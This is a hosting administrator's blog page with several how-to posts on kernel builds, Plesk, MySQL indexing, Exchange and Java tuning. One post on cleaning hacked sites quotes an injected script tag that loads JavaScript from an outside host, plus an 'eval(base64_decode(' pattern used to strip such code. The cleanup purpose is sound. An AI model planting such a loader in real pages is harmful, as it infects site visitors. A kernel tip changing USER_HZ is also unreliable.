Skip to content
May 20 11

How to compile custom kernel on Centos/Xen or optimize CS:S server

by admin

To be able to perform a successful kernel build, you will need to install the following packages:

  • yum groupinstall "Development Tools" # This will ensure that you have all the required tools for the build.
  • yum install ncurses-devel # This is required to enable a make *config command to execute correctly.
  • yum install qt-devel # This is only necessary if you wish to use make xconfig instead of make gconfig or make menuconfig.
  • The full kernel source tree.
yum install kernel-devel
or
yum install kernel-xen-devel

As root, install the packages rpm-build, redhat-rpm-config and unifdef:

[root@host]# yum install rpm-build redhat-rpm-config unifdef

As an ordinary user, not root, create a directory tree based on ~/rpmbuild:

[user@host]$ mkdir -p ~/rpmbuild/{BUILD,RPMS,SOURCES,SPECS,SRPMS}

[user@host]$ echo '%_topdir %(echo $HOME)/rpmbuild' > ~/.rpmmacros

Once you have located the source file, you can install it by running, for example:

[user@host]$ rpm -i http://mirror.centos.org/centos/5/updates/SRPMS/kernel-2.6.18-238.9.1.el5.src.rpm 2>&1 | grep -v mockb

Now that the source rpm is installed, unpack and prepare the source files:

[user@host]$ cd ~/rpmbuild/SPECS

[user@host SPECS]$ rpmbuild -bp --target=`uname -m` kernel-2.6.spec 2> prep-err.log | tee prep-out.log

The kernel source tree will now be found in the directory ~/rpmbuild/BUILD/.

Configuring the kernel

With the buildroot correctly set up, it’s time to modify the kernel configuration. Change directory to ~/rpmbuild/BUILD/kernel-2.6.18/linux-2.6.18.`uname -m`/ and copy into this directory, as .config, one of two files:

[user@host]$ cd ~/rpmbuild/BUILD/kernel-2.6.18/linux-2.6.18.`uname -m`

Either -

[user@host]$ cp configs/kernel-2.6.18-`uname -m`[-type].config .config

- or -

[user@host]$ cp /boot/config-`uname -r` .config

First run make oldconfig. Now you should run either make menuconfig, make gconfig or make xconfig to customize the kernel configuration. Once complete, remember to save your changes.

For CS:S server :

############################

if this doesnt pop up a nice wizard, you will need to install ncurses-devel and ncurses.

Now we are inside menuconfig wizard change these settings:
Processor type and features —>
NO Tickless System (Dynamic Ticks)
YES High Resolution Timer Support
Processor family (Hit Enter and choose your processor) —>
Preemption Model (Hit Enter and choose: Preemptible Kernel (Low-Latency Desktop))
Timer frequency (Hit enter and choose: 1000 HZ) —>

Power management options (ACPI, APM) —>
Disable everything except ACPI
ACPI (Advanced Configuration and Power Interface) Support
YES ACPI Support
CPU Frequency scaling —> OFF

First off, lets edit include/linux/jiffies.h

scroll down and find this section:

Code:
#elif HZ >= 384 && HZ < 768
# define SHIFT_HZ       9
#elif HZ >= 768 && HZ < 1536
# define SHIFT_HZ       10
#else
# error You lose.
#endif

and change it to this:

Code:
#elif HZ >= 384 && HZ < 768
# define SHIFT_HZ       9
#elif HZ >= 768 && HZ < 1536
# define SHIFT_HZ       10
#elif HZ >= 1536 && HZ < 3072
# define SHIFT_HZ       11
#else
# error You lose.
#endif

basically adding the 11th statement. Save that

Next we want to edit include/asm-<distro>/param.h
where distro is your architecture type, basically asm-x86_64 for 64bit or asm-i386 for 32bit.

At the top of the file you will find this section

Code:
#ifdef __KERNEL__
# define HZ             CONFIG_HZ       /* Internal kernel timer frequency */
# define USER_HZ        100            /* .. some user interfaces are in "ticks" */
# define CLOCKS_PER_SEC         (USER_HZ)       /* like times() */
#endif

Change the USER_HZ from 100 to 1500 and only that:

Code:
#ifdef __KERNEL__
# define HZ             CONFIG_HZ       /* Internal kernel timer frequency */
# define USER_HZ        1500            /* .. some user interfaces are in "ticks" */
# define CLOCKS_PER_SEC         (USER_HZ)       /* like times() */
#endif

Save it. And thats it.

#####################################

Now you will need to modify the kernel specification file.

[user@host]$ cd ~/rpmbuild/SPECS

[user@host SPECS]$ cp kernel-2.6.spec kernel-2.6.spec.distro
[user@host SPECS]$ vi kernel-2.6.spec

 

Add, as the first line of the .config file, either:

# i386

- or -

# x86_64

Copy the .config file back to the configs/ directory. This is basically the opposite of the earlier copy command:

[user@host]$ cp .config configs/kernel-2.6.18-`uname -m`[-type].config

The final step is to copy the entire contents of the configs/ directory to the ~/rpmbuild/SOURCES/ directory.

[user@host]$ cp configs/* ~/rpmbuild/SOURCES

Now you will need to modify the kernel specification file.

[user@host]$ cd ~/rpmbuild/SPECS

[user@host SPECS]$ cp kernel-2.6.spec kernel-2.6.spec.distro
[user@host SPECS]$ vi kernel-2.6.spec

At line 73, the definition of buildid is commented out. This must be uncommented and given a value to avoid a conflict with your currently installed kernel. Change the line in similar manner to the example below:

 

%define buildid .your_identifier
There should be no space between the “%” and the word “define”.

Starting at line 12418, there is a block of code that has to be commented out. This block of code begins with the statement #if a rhel kernel, apply the rhel config options. Comment out the following 25 lines to build customised CentOS-5 kernels ( <!> This step is not required to build customised CentOS-4 kernels.):

 

#if a rhel kernel, apply the rhel config options
#%if 0%{?rhel}
#  for i in %{all_arch_configs}
#  do
#    mv $i $i.tmp
#    $RPM_SOURCE_DIR/merge.pl $RPM_SOURCE_DIR/config-rhel-generic $i.tmp > $i
#    rm $i.tmp
#  done
#%ifarch x86_64 noarch
#  for i in kernel-%{kversion}-x86_64*.config
#  do
#    mv $i $i.tmp
#    $RPM_SOURCE_DIR/merge.pl $RPM_SOURCE_DIR/config-rhel-x86_64-generic $i.tmp > $i
#    rm $i.tmp
#  done
#%endif
#%ifarch ppc64 noarch
#  #CONFIG_FB_MATROX is disabled for rhel generic but needed for ppc64 rhel
#  for i in kernel-%{kversion}-ppc64.config
#  do
#    mv $i $i.tmp
#    $RPM_SOURCE_DIR/merge.pl $RPM_SOURCE_DIR/config-rhel-ppc64-generic $i.tmp > $i
#    rm $i.tmp
#  done
#%endif
#%endif

Finally, if you have any patches to apply, you need to make reference to them by adding two lines for each patch. After line 6320, which should be near the end of the patch declarations, add your declaration starting with the number 40000, so that your patch is not in any danger of conflicting with the RHEL/CentOS kernel patch space. For example:

 

Patch40000: my-custom-kernel.patch

After line 12394 add the line to apply your patch. All you need to do is add is the patch number you declared earlier and rpmbuild will automagically apply it for you. For example:

 

%patch40000 -p1

Building the new kernel

Start the build:

 

[user@host SPECS]$ rpmbuild -bb --target=`uname -m` kernel-2.6.spec 2> build-err.log | tee build-out.log

For kernels >= 2.6.18-53.el5, you can add some useful options to the rpmbuild command by using the –with and/or –without flags and associated arguments. The options to note are:

 

--with baseonly
--with xenonly
--without up
--without xen
--without debug
--without debuginfo
--without fips
--without kabichk

For example, to build just the base kernel packages use:

 

--with baseonly --without debug --without debuginfo

To build just the xen kernel packages use:

 

--with xenonly --without debug --without debuginfo

To build just the PAE kernel packages use:

--without up --without xen --without debug --without debuginfo

When the build completes, your custom kernel rpm files will be found in the ~/rpmbuild/RPMS/`uname -m`/ directory. Make sure that you install those files, as root, using a rpm -ivh kernel-*.rpmcommand. Note: If you have built a kernel version that is older than a currently installed version you will also have to use the –oldpackage flag with the rpm command.

UNDER NO CIRCUMSTANCES use a rpm -Uvh command to install your kernel as this will update (overwrite) the currently installed version. Hence if you have a problem with your custom kernel, you will not be able to revert to the previous, working, version.

Sources from:

http://wiki.centos.org/HowTos/Custom_Kernel

http://wiki.centos.org/HowTos/I_need_the_Kernel_Source

and

http://forums.srcds.com/viewtopic/8378/%7Bpage%7D

 

Leave a comment
Apr 22 11

Where are the plesk key files?

by admin

Where can we find the plesk key file (file containing the key)?

Get the Key number/files from shell:

1. Parallels Panel 7.x – 8.x:
# grep ‘Key number’ /etc/psa/psa.key

2. Parallels Panel 9.x:
grep ‘key-number’ /etc/sw/keys/keys/key*

Plesk for Windows:

1. In Plesk control panel go to Server, License Management and see the license number there.
2. Use the command in the command prompt:
“%plesk_bin%\keymng.exe” –get-key-number

key file on plesk windows is in:

C:\Program Files (x86)\Parallels\Plesk\admin\repository\keys\keyxxxxxx

when you change it , you have to delete C:\Program Files (x86)\Parallels\Plesk\admin\repository\registry.xml and it will be recreated after first accessing plesk interface.

 

Leave a comment
Apr 13 11

How to easy clean infected sites

by admin

When you experience code injection in your site and there is only appending of code to the end of your site files you can clean it with :

cd to your site’s httpdocs and run:

find .  -type f -exec sed -i ‘/oployau.fancountblogger.com/d’ {} \;

for lines like :

js/ac_runactivecontent.js:document.write(‘<s’+'cript type=”text/javascript” src=”http://oployau.fancountblogger.com:8080/Link.js”></scr’+'ipt>’);

or just

find . -name “*.php” -type f -exec sed -i ‘/eval(base64_decode(/d’ {} \;

if you want to check/repair only php files with base64 encoded injection.

Of course you need shell access for this or you can just request you hosting guys to do it for you.

 

Leave a comment
Apr 8 11

Automatically suspending domains after update to Plesk9

by admin

it turns out Plesk 9 has something called the “Overuse Policy” which is configured in “Resource Usage” for each client. Careful with this as you might upgrade from Plesk 8.x and it defaults to “Overuse is not allowed”, which causes the auto-suspend to be activated if any domains exceed their limits.

To solve this you can set this in psa database:

update cl_param set val = ‘false’ where param = ‘OveruseBlock’;
update dom_param set val = ‘false’ where param = ‘OveruseBlock’;

so no client or domain will be suspended . The drawback is that clients will be able to overuse any limits like no of domains , databases ,email accounts….

Leave a comment
Feb 9 11

Optimize mysql server/queries

by admin

On a mysql server there are a lot of queries to optimize and a lot of load generated by them. I’ll try to present the most usual optimization issues and how to identify them.

First you’ll have to check mysql service settings . You can check them manually by following commands in mysql command line:

mysql>show variables;

or

mysql>show variables like ‘%cache%’;

and

mysql> show status;

you can check the counters and increase or decrease them according to their usage and limits.

The more easy way is to use some scripts to check mysql settings like  : MySQL performance tuning primer script (tuning-primer.sh).

First and most important optimization is to activate and set query_cache and query_cache_size to lower disk IO usage.

After that you will have to check the running queries . For that you’ll need to enable first :

log-slow-queries= /var/lib/mysql/mysql-slow.log

long-query-time=3

in my.cnf then touch /var/lib/mysql/mysql-slow.log and set owner as mysql user/group. You can optionally add “log-queries-not-using-indexes”

Open then /var/lib/mysql/mysql-slow.log and check slow queries one by one.

Not every query in the slow query logs is necessary a bad one. Look for queries where some of the following criteria are met:

A) “Rows_examined” is more than 2000

B) “Rows_examined” is less than 2000 but that query is being run 20 times a second.

C) “Rows_examined” is three times bigger than “Rows_sent”

(Note that these are rough criteria. Your mileage may vary depending upon your situation.)

Focus on the two or three worst queries at first. Once you’ve found a few, utilize the EXPLAIN statement to find a better way to restructure your query. See this link for an explanation and walkthrough of the EXPLAIN statement.

Now lets grep in the log file:

grep Rows_examined /var/lib/mysql/mysql-slow.log.old | sort -g -k9 -r |head -5

a sample result would be:

# Query_time: 19  Lock_time: 0  Rows_sent: 31  Rows_examined: 6424367

# Query_time: 58  Lock_time: 0  Rows_sent: 3886219  Rows_examined: 3886219

# Query_time: 47  Lock_time: 0  Rows_sent: 3886219  Rows_examined: 3886219

# Query_time: 40  Lock_time: 0  Rows_sent: 3886219  Rows_examined: 3886219

# Query_time: 39  Lock_time: 0  Rows_sent: 3886219  Rows_examined: 3886219

# search for the worst offender, here’s one way to do that:

grep -A 2 -B 2 3886219  /var/lib/mysql/mysql-slow.log

# Time: 030611  18:49:05

# User@Host: dbusername[dbusername] @ composer.com [166.233.115.222]

# Query_time: 1  Lock_time: 0  Rows_sent: 3886219  Rows_examined: 3886219

SELECT msgs.*, username AS sender_username FROM msgs INNER JOIN users ON (users.id = msgs.sender_id) WHERE user_id=939 AND msgs.status != 1 AND del != 2 ORDER BY date DESC;

# Open up a mysql shell to fix the problem:

[localhost]$ mysql -h mysql.exampledomain.com -u dbusername -pYOURPASSWORDHERENOSPACES dbname

# EXPLAIN statement to show you how bad the query is.

# Notice that 42000 rows rows of data are examined.

mysql> EXPLAIN SELECT msgs.*, username AS sender_username FROM msgs INNER JOIN users ON (users.id = msgs.sender_id) WHERE user_id=939 AND msgs.status != 1 AND del != 2 ORDER BY date DESC;

+——-+——–+—————+———+———+—————-+——-+—————————-+

| table | type   | possible_keys | key     | key_len | ref            | rows  | Extra                      |

+——-+——–+—————+———+———+—————-+——-+—————————-+

| msgs  | ALL    | NULL          | NULL    |    NULL | NULL           | 3886219 | where used; Using filesort |

| users | eq_ref | PRIMARY       | PRIMARY |       8 | msgs.sender_id |     1 |                            |

+——-+——–+—————+———+———+—————-+——-+—————————-+

2 rows in set (0.00 sec)

# How long does the query take before fixing?  About 1 second.

# (slightly modified for demostration purposes, but same result still).

mysql> SELECT count(*) FROM msgs INNER JOIN users ON (users.id = msgs.sender_id) WHERE user_id=939 AND msgs.status != 1 AND del != 2 ORDER BY date DESC;

+———-+

| count(*) |

+———-+

|      631 |

+———-+

1 row in set (1.03 sec)

# You want to be indexing on stuff in your WHERE and JOIN statements.

# specifically, where there is lots of uniqueness or “cardinality”.

# user_id from above is really good, because there are lots of unique values

# for user_id.  Same thing goes for users.id and msgs.sender_id

# msgs.status won’t help that much (but won’t hurt) because mostly its values are

# 0 and 1.  same thing goes for “del”.

# Add an index on the user_id, and msgs.sender_id columns.

# users.id is already indexed

# Note: always try to add a key of length 10 first, it’s better (if possible).

mysql> create index user_id_index on msgs(user_id(10));

ERROR 1089: Incorrect sub part key. The used key part isn’t a string, the used length is longer than the key part or the table handler doesn’t support unique sub keys

mysql> create index user_id_index on msgs(user_id);

Query OK, 42857 rows affected (1.59 sec)

Records: 42857  Duplicates: 0  Warnings: 0

mysql> create index sender_id_index on msgs(sender_id(10));ERROR 1089: Incorrect sub part key. The used key part isn’t a string, the used length is longer than the key part or the table handler doesn’t support unique sub keys

mysql> create index sender_id_index on msgs(sender_id);

Query OK, 42858 rows affected (1.16 sec)

Records: 42858  Duplicates: 0  Warnings: 0

# Check the indices, see if they look good.

# They do look good.  Notice the high cardinatlity (uniqueness) of all three keys.

mysql> show index from msgs;

+——-+————+—————–+————–+————-+———–+————-+———-+——–+———+

| Table | Non_unique | Key_name        | Seq_in_index | Column_name | Collation | Cardinality | Sub_part | Packed | Comment |

+——-+————+—————–+————–+————-+———–+————-+———-+——–+———+

| msgs  |          0 | PRIMARY         |            1 | id          | A         |       42855 |     NULL | NULL   |         |

| msgs  |          1 | user_id_index   |            1 | user_id     | A         |        1224 |     NULL | NULL   |         |

| msgs  |          1 | sender_id_index |            1 | sender_id   | A         |        1071 |     NULL | NULL   |         |

+——-+————+—————–+————–+————-+———–+————-+———-+——–+———+

3 rows in set (0.00 sec)

# Very good.

# Now, check to see if your index actually improved anything.

# First, check with the EXPLAIN statement.  Much better!

mysql> EXPLAIN SELECT msgs.*, username AS sender_username FROM msgs INNER JOIN users ON (users.id = msgs.sender_id) WHERE user_id=939 AND msgs.status != 1 AND del != 2 ORDER BY date DESC;

+——-+——–+——————————-+—————+———+—————-+——+—————————-+

| table | type   | possible_keys                 | key           | key_len | ref            | rows | Extra                      |

+——-+——–+——————————-+—————+———+—————-+——+—————————-+

| msgs  | ref    | user_id_index,sender_id_index | user_id_index |       8 | const          |  635 | where used; Using filesort |

| users | eq_ref | PRIMARY                       | PRIMARY       |       8 | msgs.sender_id |    1 |                            |

+——-+——–+——————————-+—————+———+—————-+——+—————————-+

2 rows in set (0.00 sec)

mysql>

# Now check the time it takes the query to complete.

# Only 0.01 seconds to complete.  Much faster.

mysql> SELECT count(*) FROM msgs INNER JOIN users ON (users.id = msgs.sender_id) WHERE user_id=939 AND msgs.status != 1 AND del != 2 ORDER BY date DESC;

+———-+

| count(*) |

+———-+

|      631 |

+———-+

1 row in set (0.01 sec)

# Now start watching tail -f /var/lib/mysql/mysql-slow.log

# to find out more tables that should be indexed

tail -f /var/lib/mysql/mysql-slow.log

Leave a comment
Feb 8 11

How to delete emails on MS Exchange server 2010 SP1

by admin

You can use two solutions to automatically delete/empty mailbox on a MS Exchange Server 2010 SP1.

1) Since MS Exchange 2010 SP1 you can use Retention policies with Retention policy tags , per mailbox , easy to setup and very helpful

Emails can be auto-deleted by being marked with policy tags and after that Managed Folder Assistant “daemon” is checking the aging all the emails .

2) you can setup (in scheduled task) an exchange shell script to delete this emails  :

in task scheduler add a “dos” script  (ex. emptybox.bat):

PowerShell.exe -command “. ‘c:\Program Files\Microsoft\Exchange Server\V14\bin\RemoteExchange.ps1′; Connect-ExchangeServer -auto; C:\Scripts\cleanmbox.ps1″
and in cleanmbox.ps1 you have to set the exchange shell comand
Search-Mailbox -Identity “mailbox id1″ -DeleteContent -Force
Search-Mailbox -Identity “mailbox id2″ -DeleteContent -Force
-you can set several commands in the same file to empty mailbox for multiple accounts
-use “-Force” to avoid confirmation dialogs
-you may have to add “Mailbox Import Export Role” to a Role Group (http://technet.microsoft.com/en-us/library/ee633452.aspx)
Read more in this regarding other options for Search-Mailbox :http://technet.microsoft.com/en-us/library/dd298173.aspx
On earlier (e.g. exchange 2010 RTM) use : Get-Mailbox -Database DB1 | Export-Mailbox -SubjectKeywords “Virus message” -DeleteContent
2 Comments
Feb 8 11

How to free up some memory when using java on openvz vps

by admin

First two easy way to free up some resources on a vps running java are: stopping java process and second, not even try to use java in a openvz VPS :)

If you are forced to use java you can lower it’s memory usage by adding following option to java startup: -Xmx32m so you lower maximum heap size .

You can try different values of heap size regarding of you java applications usage.

On Plesk panel you can set this in : /usr/share/tomcat5/bin/setenv.sh

On cPanel you can set it on : /usr/sbin/starttomcat like bellow:

#########################
system(
qw(
./jsvc
-user tomcat
-Xms64m
-Xmx64m
-cp ./bootstrap.jar
-Djava.endorsed.dirs=../common/endorsed
-outfile ../logs/catalina.out
-errfile ../logs/catalina.err
-verbose
)
###################################
or set additional java options by creating file : /var/cpanel/tomcat.options (may not work for some options).
Leave a comment
Jan 11 11

Recalculate stats and free space for only one domain in Plesk

by admin

It’s useful if a client has gone over their allocated disk space. Occasionally even if they delete everything Plesk still thinks they are over until the nightly cron jobs are re-run.

This command just forces the job to re-run on  a single domain:

/usr/local/psa/admin/sbin/statistics –calculate-one –domain-name=Domain_name.com

Leave a comment
Sep 23 10

Plesk windows cannot add domain or update dns zone after last windows update

by admin

Symptoms

MSDNS is used as DNS server. Every time when you try to update domain hosting or DNS settings of the domain, Parallels Plesk Panel hangs. Sometimes it can fails with the following error:
Failed domain creation: Unable to update domain data: Unable to create dnsmng object: dnsmng failed: Empty error message from utility

The following message can be found in event viewer:
Faulting application DNSMng.exe, version 9.501.0.0, time stamp 0x4bc1f9fd, faulting module MsProv.dll, version 9.501.0.0, time stamp 0x4bc205bc, exception code 0xc0000005, fault offset 0x000600bb, process id 0x56c, application start time 0x01cae1ae46c559db

Utility “%plesk_bin%\dnsmng.exe” cannot be run from command line. It fails with the error:
DNSMng.exe – Application Error : The instruction at “0x00ba74ac” referenced memory at “0x00bd2108″. The memory could not be “read”

Resolution

This problem was discovered in Parallels Plesk Panel . Issue is caused by installed MS update KB976576. It updates libraries which are used by MSDNS.

Hotfix can be applied on Parallels Plesk Panel versions 8.6, 9.0-9.3 and 9.5

Before applying the fix you need to install the latest Microsoft Visual C++ 2005 Redistributable Package ATL Security Update vcredist_x86.exe from
http://www.microsoft.com/downloads/details.aspx?familyid=766a6af7-ec73-40ff-b072-9112bab119c2&displaylang=en

and backup the original file.

Fix for Parallels Plesk Panel version8.6:
Replace the file “%plesk_bin%\MsProv.dll” with the file MsPRov.dll from the attachment.

Fix for Parallels Plesk Panel version 9.0-9.3:
Replace the file “%plesk_bin%\MsProv.dll” with the file MsPRov.dll from the attachment.

Fix for Parallels Plesk Panel version 9.5:
Replace the file “%plesk_bin%\MsProv.dll” with the file MsPRov.dll from the attachment.

Once it is done, check if you can perform operations with domains and manage DNS records.

Additional information

%plesk_bin% is environment variable which points to Paralles Plesk binaries folder. Usually it is C:\Program files\Parallels\Plesk\admin\bin

Leave a comment
Aug 30 10

How to disable php scripts execution in 777 folders

by admin

Many times malware php scripts are uploaded to sites when 777 (or just enough)  permision folders are present. Sometimes you just can’t set permissions to a secure level (because of crap applications) so you have to secure these folders another way.

One solution is to use .htaccess files for example to stop direct php access/execution in that folder/subfolders :

#touch .htaccess

content of .htaccess:

<Files *.php>
Order Deny,Allow
Deny from all
</Files>
Leave a comment
« Older Entries